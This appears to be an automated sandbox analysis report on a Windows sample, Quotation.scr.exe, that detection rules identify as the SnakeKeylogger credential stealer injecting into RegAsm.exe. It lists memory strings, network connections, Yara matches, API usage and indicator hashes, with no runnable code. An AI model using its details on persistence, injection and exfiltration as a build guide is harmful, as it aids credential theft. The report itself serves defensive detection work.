                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Quotation.scr.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCB0 NtProtectVirtualMemory,0_2_0586CCB0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E1A0 NtResumeThread,0_2_0586E1A0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586CCA9 NtProtectVirtualMemory,0_2_0586CCA9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586E198 NtResumeThread,0_2_0586E198
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0224A9B00_2_0224A9B0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022467290_2_02246729
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022467380_2_02246738
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_02246F090_2_02246F09
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_022471880_2_02247188
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578F5EF0_2_0578F5EF
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05785CB90_2_05785CB9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057868A00_2_057868A0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578EFC00_2_0578EFC0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578FA300_2_0578FA30
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057800400_2_05780040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578003B0_2_0578003B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057853680_2_05785368
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_057853590_2_05785359
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578EFB10_2_0578EFB1
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05786E500_2_05786E50
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578FA200_2_0578FA20
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058417B00_2_058417B0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058451F00_2_058451F0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05842DB80_2_05842DB8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05841AD70_2_05841AD7
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05867D800_2_05867D80
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586747E0_2_0586747E
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05869F200_2_05869F20
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058672AB0_2_058672AB
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05861AF80_2_05861AF8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058662780_2_05866278
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866DEB0_2_05866DEB
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05867D700_2_05867D70
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866CAF0_2_05866CAF
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05869F110_2_05869F11
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866F350_2_05866F35
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058667660_2_05866766
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058666B90_2_058666B9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058669960_2_05866996
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058670920_2_05867092
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058670EA0_2_058670EA
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058693B70_2_058693B7
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866BF90_2_05866BF9
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586735F0_2_0586735F
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05866A290_2_05866A29
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D15460_2_058D1546
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D65670_2_058D6567
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D144B0_2_058D144B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D14580_2_058D1458
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058DC3C00_2_058DC3C0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058DC3D00_2_058DC3D0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D0BE80_2_058D0BE8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0593ECA00_2_0593ECA0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059300060_2_05930006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059300400_2_05930040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B800060_2_05B80006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B800400_2_05B80040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B9CB380_2_05B9CB38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC1462_2_012DC146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D53702_2_012D5370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DD5992_2_012DD599
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC4682_2_012DC468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DC7382_2_012DC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D69A02_2_012D69A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DE9902_2_012DE990
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D29E02_2_012D29E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCA082_2_012DCA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D9DE02_2_012D9DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCCD82_2_012DCCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DCFA92_2_012DCFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D6FC82_2_012D6FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DE9832_2_012DE983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DFAC82_2_012DFAC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D3E092_2_012D3E09
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.000000000058E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000000.2115204197.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2253589437.0000000005590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFfxzkbh.dll" vs Quotation.scr.exe
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Quotation.scr.exe
                    Source: Quotation.scr.exeBinary or memory string: OriginalFilenameVeoxmodkw.exe4 vs Quotation.scr.exe
                    Source: Quotation.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, --R--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, --R--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, K---.csBase64 encoded string: 'UzWebPv57/MVh76TQDG4CbNFpn7XxfirTsBUOsLwJPvNREEYND/Y72ZMmZCNMrPm'
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: Quotation.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Quotation.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
